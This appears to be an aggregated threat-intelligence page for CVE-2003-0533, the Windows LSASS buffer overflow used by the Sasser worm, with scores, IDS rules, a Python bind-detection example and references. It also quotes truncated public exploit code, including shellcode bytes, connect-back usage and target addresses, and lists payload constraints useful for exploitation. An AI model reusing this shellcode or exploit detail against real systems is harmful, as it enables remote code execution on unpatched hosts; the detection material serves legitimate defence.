CVE-2003-0533
Published 2004-06-01
Priority P2 · 7.5 high (CVSS 2.0) · vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploited in the wild (VulnCheck KEV)
EPSS: 86.15% (99.7th percentile)
Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_nt | — | — |
Detection & IOCs (extracted from sources)
- port: 135
- bytes: j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|
- snort: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102507; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
- bytes: \xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF
- bytes: \xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF
- Detect DCERPC bind attempts to the LSASS interface UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 over ncacn_np \lsarpc on TCP port 135 or 445; the LSASS RPC UUID bytes 6a 28 19 39 0c b1 d0 11 9b a8 00 c0 4f d9 2e f5 appear in the bind request and are a reliable signature.
- The exploit establishes a null SMB session to IPC$ before invoking the vulnerable RPC call; alert on unauthenticated WNetAddConnection2 / null-session IPC$ connections followed by DCERPC activity to lsarpc.
- The Metasploit module uses DCERPC call opnum 9 on the lsarpc pipe; alert on DCERPC requests with opnum 9 to the LSASS interface UUID.
- Payload bad characters for this exploit are \x00\x0a\x0d\x5c\x5f\x2f\x2e; shellcode in the wild will avoid these bytes. Reverse-shell shellcode starts with the distinctive stub EB 10 5B 4B 33 C9 66 B9 25 01; bind-shell shellcode starts with EB 10 5A 4A 33 C9 66 B9 7D 01.
- The Sasser worm exploited this vulnerability; monitor for lsass.exe spawning unexpected child processes or network connections, and for abnormal writes to DCPROMO.LOG.
- DCERPC request fragmentation (FragSize parameter) may be used to evade length-based detection; inspect reassembled DCERPC streams rather than individual fragments.
- The exploit requires two runs against Windows XP targets due to memory layout differences; a single failed attempt should not be treated as a definitive miss.
- The exploit payload space is limited to 1024 bytes with a stack adjustment of -3500; staged payloads or large shellcode will not fit without modification.
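The UUID-based detection the bullets above describe, as an added Python example (not code from the page's sources): it parses the context list of a DCERPC bind PDU, reports whether the LSASS interface is requested, and shows that the rules' content string is simply that UUID in little-endian wire order at byte offset 32 of the bind PDU. The bind PDU it inspects is constructed inside the block; the endpoint-mapper UUID serves only as a non-LSASS contrast.

```python
import struct
import uuid

# Interface UUID of the LSASS RPC interface (lsarpc) named in the signatures above,
# and the NDR transfer syntax that every bind request carries alongside it.
LSASS_IFACE = uuid.UUID("3919286a-b10c-11d0-9ba8-00c04fd92ef5")
NDR_XFER = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
EPM_IFACE = uuid.UUID("e1af8308-5d1f-11c9-91a4-08002b14a0fa")  # endpoint mapper: benign contrast

PTYPE_BIND = 0x0B     # DCERPC packet type for bind
CTX_LIST_OFFSET = 28  # 16-byte common header + max_xmit, max_recv, assoc_group, n_ctx + padding


def bind_contexts(pdu: bytes) -> list:
    """Return the abstract-syntax (interface) UUIDs requested by a DCERPC bind PDU.

    Non-bind PDUs yield an empty list. Only little-endian data representation
    (DREP byte 0, bit 4 set), which is what Windows clients send, is handled.
    """
    if len(pdu) < CTX_LIST_OFFSET or pdu[0] != 5 or pdu[2] != PTYPE_BIND:
        return []
    if not pdu[4] & 0x10:
        raise ValueError("big-endian DREP not supported by this example")
    frag_len = struct.unpack_from("<H", pdu, 8)[0]
    end = min(len(pdu), frag_len)
    n_ctx = pdu[24]
    off = CTX_LIST_OFFSET
    found = []
    for _ in range(n_ctx):
        if off + 24 > end:        # truncated context element: stop rather than guess
            break
        n_xfer = pdu[off + 2]     # number of transfer syntaxes in this element
        found.append(uuid.UUID(bytes_le=pdu[off + 4:off + 20]))
        off += 24 + 20 * n_xfer   # 24-byte element header + 20 bytes per transfer syntax
    return found


def is_lsass_bind(pdu: bytes) -> bool:
    """True when the bind PDU requests the LSASS interface, the condition the Snort rules encode."""
    return LSASS_IFACE in bind_contexts(pdu)


def build_bind(iface: uuid.UUID, iface_ver: int = 0, call_id: int = 1) -> bytes:
    """Constructed sample input: a minimal single-context bind PDU for `iface`."""
    ctx = (struct.pack("<HBB", 0, 1, 0) + iface.bytes_le + struct.pack("<I", iface_ver)
           + NDR_XFER.bytes_le + struct.pack("<I", 2))
    body = struct.pack("<HHIB3x", 4280, 4280, 0, 1) + ctx
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 0x03, b"\x10\x00\x00\x00",
                      16 + len(body), 0, call_id)
    return hdr + body


if __name__ == "__main__":
    # The rules' content string is this UUID in little-endian (on-the-wire) byte order.
    print(LSASS_IFACE.bytes_le.hex(" "))
    print(is_lsass_bind(build_bind(LSASS_IFACE)), is_lsass_bind(build_bind(EPM_IFACE)))
```

A bind to lsarpc is routine on a domain network; the signal the rules use is the bind followed by a request to opnum 9, so treat this check as the first half of that flowbit pair rather than an alert on its own.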
CVSS provenance
- nvd: v2.0 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- vulncheck: 7.5 HIGH
GHSA
GHSA-36fg-2gj3-qpvv [HIGH] (ghsa, unreviewed, 2022-04-29): Stack-based buffer overflow in certain Active Directory service functions in LSASRV
VulnCheck
Microsoft netmeeting Out-of-bounds Write [HIGH] (vulncheck, 2003, CVSS 7.5)
Affected: Microsoft netmeeting
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.broadcom.com/support/security-center/attacksignatures/deta
Suricata
GPL NETBIOS DCERPC LSASS bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102507; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102526; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt"; flow:established,to_server; flowbits:isset,netbios.lsass.bind.attempt; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; distance:59; content:"|00|"; within:1; distance:1; content:"|09 00|"; within:2; distance:19; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:attempted-admin; sid:2102511; rev:11; metadata:created_at 2010_09_23, cve CVE_2003_0533, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS unicode bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102513; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium,
Suricata
GPL NETBIOS DCERPC LSASS direct bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102524; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102512; rev:10; metadata:created_at 2010_09_23, cve C
Suricata
GPL NETBIOS SMB DCERPC LSASS bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102510; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_se
Suricata
GPL NETBIOS SMB DCERPC LSASS direct bind attempt (suricata, 2010-09-23)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102525; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14
Exploit-DB
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit) (exploitdb, 2010-07-03)
---
##
# $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LSASS service, this vulnerability
was originally found by eEye. When re-exploiting a Windows XP system, you will need
need to run this module twice. DCERPC request fragmentation can be performed by setting
Exploit-DB
Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011) (exploitdb, 2004-04-29)
---
/* HOD-ms04011-lsasrv-expl.c:
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit
* Version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
* -------------------------------------------------------------------
* Usage:
*
* expl [connectback IP] [options]
*
* Targets:
* 0 [0x01004600]: WinXP Professional [universal] lsass.exe
* 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
* 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
*
* Options:
* -t: Detect remote OS:
* Windows 5.1 - WinXP
* Windows 5.0 - Win2k
* -------------------------------------------------------------------
*
* Tested on
* - Windows XP Professional SP0 English version
* - Windows XP Professional SP0 Russian version
* - Windows XP P
Exploit-DB
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011) (exploitdb, 2004-04-24)
---
#include
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")
unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\x
Metasploit
MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow (metasploit)
This module exploits a stack buffer overflow in the LSASS service; this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need to run this module twice. DCERPC request fragmentation can be performed by setting the 'FragSize' parameter.
arXiv
The MalSource Dataset: Quantifying Complexity and Code Reuse in Malware Development (arxiv_fulltext, 2018-11-16)
Alejandro Calleja, Juan Tapiador, and Juan Caballero
A. Calleja and J. Tapiador are with the Department of Computer Science, Universidad Carlos III de Madrid, 28911 Leganes, Madrid, Spain. E-mail: {accortin, jestevez}@inf.uc3m.es.
J. Caballero is with the IMDEA Software Institute, Madrid, Spain. E-mail: [email protected].
## Abstract
During the last decades, the problem of malicious and unwanted software (malware) has surged in numbers and sophistication. Malware plays a key role in most of today's cyber attacks and has consolidated as a commodity in the underground economy. In this work, we analyze the evolution of malware from 1975 to date from a software engineering perspective.
We anal
CTF
README (ctf_writeups)
# CTF Writeups
Welcome to my CTF Writeups repository! Here, I document the solutions and methodologies used to solve various Capture The Flag (CTF) challenges. This repository is intended to serve as a learning resource for others interested in cybersecurity and CTF competitions.
Capture The Flag (CTF) competitions are a popular way to practice and improve cybersecurity skills. These competitions present various challenges that require problem-solving, creativity, and technical knowledge.
## Writeups
The writeups in this repository (located in the "writeups" folder) are categorised based on the nature of the challenge. Each writeup provides step-by-step solutions, along with explanations of the tools and techniques used. The difficulty rating associated with each challenge matches the dif
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020069.html
- http://marc.info/?l=bugtraq&m=108325860431471&w=2
- http://www.ciac.org/ciac/bulletins/o-114.shtml
- http://www.eeye.com/html/Research/Advisories/AD20040413C.html
- http://www.kb.cert.org/vuls/id/753212
- http://www.securityfocus.com/bid/10108
- http://www.us-cert.gov/cas/techalerts/TA04-104A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-011
- https://exchange.xforce.ibmcloud.com/vulnerabilities/15699
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A883
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A898
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A919